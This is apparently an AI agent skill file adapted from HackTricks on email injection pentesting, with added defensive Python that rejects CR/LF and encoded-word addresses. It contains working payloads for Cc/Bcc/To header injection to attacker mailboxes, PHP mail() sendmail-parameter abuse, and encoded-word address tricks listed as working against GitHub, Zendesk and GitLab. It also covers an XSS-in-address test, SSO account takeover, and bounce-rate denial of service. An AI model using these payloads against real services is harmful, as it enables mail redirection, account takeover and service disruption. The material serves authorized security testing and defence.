Hacktricks-skills email-injection-pentest

How to identify and test email injection vulnerabilities in web applications. Use this skill whenever the user mentions email injection, header injection, PHP mail exploitation, email bypass techniques, SSO email attacks, or any email-related security testing. This includes testing for Cc/Bcc injection, To header manipulation, subject/body injection, PHP mail() function abuse, email name bypass techniques, and third-party SSO email attacks.

Install: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/pentesting-web/email-injections/SKILL.MD

Email Injection Pentesting

A comprehensive guide for identifying and testing email injection vulnerabilities in web applications.

Quick Reference

Header Injection Payloads

Cc/Bcc Injection (after sender):

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

To Header Injection:

From:sender@domain.com%0ATo:attacker@domain.com

Subject Injection:

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Body Injection (two line feeds):

From:sender@domain.com%0A%0AMy%20New%20Fake%20Message.

Testing Methodology

1. Identify Email Injection Points

Look for these common vectors:

  • Contact forms with email fields
  • Password reset functionality
  • User registration with email verification
  • Newsletter subscription forms
  • Any form that sends emails on submission

2. Test Header Injection

Step 1: Inject Cc/Bcc headers

  • Add %0ACc:attacker@domain.com after the email field value
  • Add %0ABcc:attacker@domain.com to test blind injection
  • Monitor the attacker-controlled mailbox for received messages

Step 2: Inject To header

  • Add %0ATo:attacker@domain.com to send a copy to the attacker
  • The original recipient still receives the email

Step 3: Test Subject/Body manipulation

  • Use %0ASubject: to inject fake subjects
  • Use %0A%0A (two line feeds, which end the header block) to inject body content

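Seen from the defender's side, every payload above works the same way: a user-controlled value is concatenated into the header block and the receiving parser treats each line feed as the start of a new header. The following Python is an added example (not part of this skill file or of HackTricks) that assembles headers the legacy string-concatenation way, parses the result to show which headers the MTA actually sees, and contrasts it with the standard-library EmailMessage API, whose default policy refuses CR/LF in header values; the form-field values are constructed from the payloads on this page.

```python
import email
from email.message import EmailMessage
from email.policy import compat32

# Constructed form inputs, shown after URL decoding (%0A -> "\n"): the page's
# Cc/Bcc payload and its body-injection payload.
CC_BCC_PAYLOAD = "sender@domain.com\nCc:recipient@domain.co,\nBcc:recipient1@domain.com"
BODY_PAYLOAD = "sender@domain.com\n\nMy New Fake Message."

def legacy_headers(sender: str, subject: str = "Contact form") -> str:
    """String concatenation in the style of PHP mail()'s $additional_headers:
    the user's value is pasted straight into the header block."""
    return f"From: {sender}\r\nSubject: {subject}\r\n\r\nThanks for writing in."

def deliver_view(raw: str) -> dict:
    """Parse the assembled text the way an MTA would and report what it
    actually sees; injected lines have become real headers or body text."""
    msg = email.message_from_string(raw, policy=compat32)
    view = {name: msg[name] for name in ("From", "Cc", "Bcc", "Subject")}
    view["body"] = msg.get_payload()
    return view

def safe_message(sender: str, subject: str = "Contact form") -> EmailMessage:
    """Same message built through the email API under its default policy,
    which raises ValueError for a header value containing CR or LF."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["Subject"] = subject
    msg.set_content("Thanks for writing in.")
    return msg

def header_api_rejects(sender: str) -> bool:
    """True when the strict policy refuses the value (the desired outcome)."""
    try:
        safe_message(sender)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for payload in (CC_BCC_PAYLOAD, BODY_PAYLOAD):
        print(deliver_view(legacy_headers(payload)))
        print("strict API rejects:", header_api_rejects(payload))
```

With the body payload the parser stops reading headers at the empty line, so the application's own Subject header ends up inside the message body.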
3. PHP mail() Function Exploitation

The PHP mail() function signature:

mail($to, $subject, $message, $additional_headers, $additional_parameters)

$additional_parameters exploitation:

  • This parameter is passed to the sendmail command line
  • Sanitized with escapeshellcmd(), which escapes shell metacharacters but not spaces or dashes, so additional options can still reach sendmail
  • Can inject sendmail-specific parameters

MTA-specific attacks:

  • Sendmail, Postfix, Exim have different parameter sets
  • Some allow file leakage or command execution
  • Research the specific MTA for targeted attacks

4. Email Name Injection Techniques

Ignored Characters:

  • + and - symbols (tagging)
  • {} in rare cases
  • Comments in parentheses ()

Examples:

john.doe+intigriti@example.com → john.doe@example.com
john.doe(intigriti)@example.com → john.doe@example.com

IP Address Domains:

john.doe@[127.0.0.1]
john.doe@[IPv6:2001:db8::1]

Email Encoding Bypass:

Format:

=?encoding?method?encoded_data?=domain.com

Common encodings:

# Quoted-printable UTF-8
=?utf-8?q?=61=62=63?=hi@example.com → abc@hi@example.com

# Base64 UTF-8
=?utf-8?b?QUJD?=hi@example.com → ABC@hi@example.com

# Punycode
x@xn--svg/-9x6 → x@<svg/

Known Working Payloads:

Platform | Payload | Result
GitHub | =?x?q?collab=40psres.net=3e=00?=foo@example.com | Sends to collab@psres.net
Zendesk | "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com | Sends to collab@psres.net
GitLab | =?x?q?collab=40psres.net_?=foo@example.com | Sends to collab@psres.net

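The name-injection and encoded-word tricks in this section, and the script-tag address used for the SSO XSS test later on the page, are all defeated by accepting nothing beyond a plain addr-spec. This Python is an added example (not from the skill file or HackTricks) of such a strict policy: it decodes embedded RFC 2047 encoded words so a reviewer can see the address hidden in a submitted value, rejects comments, IP literals, angle brackets and control characters, and canonicalises "+tag" forms for uniqueness checks; the reject patterns and the canonicalisation rule are policy assumptions, not behaviour of any specific MTA.

```python
import re
import base64
import quopri

# Characters an application should never accept inside a plain mailbox address:
# CR/LF (header splitting), NUL, quotes, angle brackets, comments, IP literals.
REJECT_CHARS = re.compile(r'[\r\n\x00"<>()\[\]]')
ENCODED_WORD = re.compile(r"=\?([^?]*)\?([qQbB])\?([^?]*)\?=")
# Deliberately narrow addr-spec: dot-atom local part, hostname-style domain.
STRICT_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

def decode_encoded_words(raw: str) -> str:
    """Show what a lenient MTA sees once it decodes RFC 2047 encoded words
    embedded in the submitted string (a reviewer aid, not a sanitiser)."""
    def _decode(m):
        charset, enc, data = m.group(1) or "ascii", m.group(2).lower(), m.group(3)
        if enc == "q":
            blob = quopri.decodestring(data.encode(), header=True)  # '_' is a space
        else:
            blob = base64.b64decode(data + "=" * (-len(data) % 4))
        try:
            return blob.decode(charset)
        except (LookupError, UnicodeDecodeError):
            return blob.decode("latin-1")  # unknown charset such as "x"
    return ENCODED_WORD.sub(_decode, raw)

def check_address(raw: str):
    """Strict allowlist policy for a user-supplied address. Returns
    (accepted, reason); each rejection names the trick it blocked."""
    if REJECT_CHARS.search(raw):
        return False, "control char, quote, bracket or comment"
    if ENCODED_WORD.search(raw):
        return False, "encoded word decodes to %r" % decode_encoded_words(raw)
    if raw.count("@") != 1:
        return False, "exactly one @ required"
    if not STRICT_ADDR.fullmatch(raw):
        return False, "outside strict addr-spec"
    return True, "ok"

def canonical(addr: str) -> str:
    """Key for uniqueness checks (policy assumption: the receiving MTA ignores
    a '+tag' and letter case). Only '+' is stripped; '-' is kept because it is
    legitimate inside many local parts."""
    local, domain = addr.rsplit("@", 1)
    return f"{local.split('+', 1)[0]}@{domain}".lower()
```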
5. Third-Party SSO Attacks

XSS via Email:

  • Some services (GitHub, Salesforce) allow XSS payloads in email addresses
  • If target service doesn't sanitize, XSS can occur
  • Test with: <script>alert(1)</script>@domain.com

Account Takeover:

  • Create account on SSO provider without email verification
  • Use that account to login to trusting services
  • Salesforce is known to allow this (shows verification status)

6. Reply-To Abuse

Technique:

From: company.com
Reply-To: attacker.com

Impact:

  • Automatic replies (out of office, bounces) go to attacker
  • Can harvest internal email addresses
  • May receive sensitive auto-generated responses

7. Hard Bounce Rate Manipulation

AWS SES Threshold: 10% hard bounce rate

What is a hard bounce:

  • Email returned due to invalid/non-existent recipient
  • Domain doesn't exist
  • Recipient server refuses email

Impact:

  • Exceeding 10% triggers service suspension
  • Can be used for denial-of-service against email services
  • Monitor bounce rates in email delivery services

Tooling

Burp Suite

  • Turbo Intruder: Fuzz email format combinations
  • Hackvertor: Create email splitting attacks

Manual Testing

  • Use URL encoding for special characters
  • Test with various MTA configurations
  • Monitor attacker email addresses for results

Reporting

When documenting email injection findings:

  1. Vulnerability Type: Header injection, name injection, SSO abuse, etc.
  2. Impact: Information disclosure, account takeover, spam relay, etc.
  3. Proof of Concept: Include exact payload and observed behavior
  4. Affected Endpoints: List all vulnerable forms/parameters
  5. Remediation: Input validation, parameterized email functions, allowlists

Safety Notes

  • Only test systems you have authorization to assess
  • Use controlled test environments when possible
  • Monitor for unintended email delivery to real users
  • Document all testing for compliance purposes